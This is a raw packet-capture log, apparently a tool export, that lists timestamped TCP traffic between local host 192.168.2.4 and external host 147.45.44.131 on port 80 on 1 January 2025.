                                                                    Jan 1, 2025 08:48:06.712167025 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.746234894 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746244907 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746249914 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746253967 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746258020 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746263027 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746421099 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746429920 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746438026 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746447086 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746454954 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746464968 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746584892 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746596098 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746624947 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.746624947 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.746666908 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.746702909 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746799946 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746809959 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746819019 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746829033 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746836901 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746840954 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.746846914 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746857882 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.746870041 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.746890068 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747273922 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747293949 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747303963 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747337103 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747359991 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747396946 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747437000 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747447014 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747476101 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747566938 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747576952 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747586012 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747596025 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747606039 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747627020 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747783899 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747795105 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747826099 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747950077 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747960091 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747968912 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747978926 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747987986 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.747988939 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.747997046 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748007059 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748008013 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748018026 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748029947 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748059988 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748194933 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748204947 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748213053 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748223066 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748231888 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748270988 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748425961 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748435974 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748445034 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748455048 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748464108 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748466969 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748480082 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748490095 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748493910 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748500109 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748517036 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748533964 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748687029 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748697042 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748706102 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748727083 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748771906 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748781919 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748790979 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748800993 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748810053 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748819113 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.748821020 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.748847961 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749296904 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749306917 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749315977 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749324083 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749334097 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749336958 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749344110 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749358892 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749368906 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749371052 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749377966 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749387980 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749392033 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749397993 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749407053 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749413013 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749417067 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749428034 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749437094 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749437094 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749447107 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749455929 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.749458075 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749483109 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.749500990 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750024080 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750034094 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750042915 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750063896 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750066996 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750077963 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750087976 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750097036 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750106096 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750112057 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750117064 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750127077 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750135899 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750140905 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750145912 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750155926 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750164032 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750165939 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750175953 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750185966 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750185013 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750195980 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750206947 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750207901 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750216007 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750226021 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750235081 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750236034 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750245094 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750261068 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750279903 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.750963926 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750973940 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750983000 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.750997066 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751003981 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.751007080 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751017094 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751025915 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751030922 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.751035929 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751063108 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.751081944 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.751223087 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751231909 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751244068 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751264095 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.751266956 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751276970 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751286030 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751295090 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.751321077 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.751344919 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834043026 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834065914 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834074974 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834084988 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834095001 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834110975 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834111929 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834121943 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834147930 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834218025 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834233999 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834244967 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834254980 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834264040 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834264994 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834275961 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834283113 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834312916 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834531069 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834542036 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834553003 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834563017 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834573030 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834573984 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834582090 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834590912 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834606886 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.834743977 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834753990 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.834790945 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835206032 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835242033 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835242987 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835253000 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835283995 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835356951 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835366964 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835377932 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835397959 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835560083 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835571051 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835581064 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835592031 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835599899 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835602999 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835613012 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835624933 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835628986 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835663080 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835800886 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835906029 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835916042 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835927010 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.835944891 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.835969925 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836095095 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836105108 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836114883 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836126089 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836134911 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836137056 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836146116 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836155891 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836160898 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836165905 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836179972 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836199045 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836353064 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836361885 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836390972 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836534023 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836544037 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836553097 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836563110 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836572886 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836572886 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836582899 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836591959 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836601973 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836610079 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836612940 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836622953 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836632967 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836637974 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836643934 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836653948 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.836656094 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.836683035 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837240934 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837250948 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837260962 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837270975 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837280989 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837284088 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837291002 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837300062 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837301016 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837311029 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837320089 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837321043 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837331057 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837341070 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837341070 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837351084 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837352037 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837361097 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837369919 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837379932 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837382078 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837389946 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837413073 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.837977886 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.837986946 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838006973 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838015079 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838021994 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838032007 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838041067 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838042021 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838052034 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838061094 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838069916 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838071108 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838080883 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838090897 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838100910 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838104010 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838110924 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838119984 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838129997 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838130951 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838140011 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838149071 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838154078 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838159084 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838169098 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838171959 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838179111 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838188887 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838191986 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838211060 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838232040 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838831902 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838841915 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838850975 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838860989 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838870049 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838871002 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838881016 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838895082 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.838897943 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.838915110 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.839159012 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839169025 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839179993 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839190006 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839200020 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839200020 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.839210033 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839220047 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839230061 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.839234114 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.839253902 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.884104013 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:06.922043085 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:06.922055006 CET8049732147.45.44.131192.168.2.4
